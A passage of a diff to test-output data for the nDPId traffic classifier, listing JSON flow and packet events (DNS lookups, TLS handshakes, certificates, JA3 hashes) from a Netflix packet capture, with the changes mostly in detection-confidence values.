{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1484319117511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319117511,"pkt":"gCqoTGHM5JjWH70UCABFAABT2RsAAP8RXyXAqAEHwKgBAct\/ADUAP5\/hcXUBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1484319117538,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319117538,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UxAAEAR1XTAqAEBwKgBBwA1y38Av8eGcXWBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAACsABDQpHgXADAABAAEAAAArAAQ0KVZPwAwAAQABAAAAKwAENCnkd8AMAAEAAQAAACsABDQpn7bADAABAAEAAAArAAQ0J+8jwAwAAQABAAAAKwAENCc7i8AMAAEAAQAAACsABDQo+f3ADAABAAEAAAArAAQ0KRH0"} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 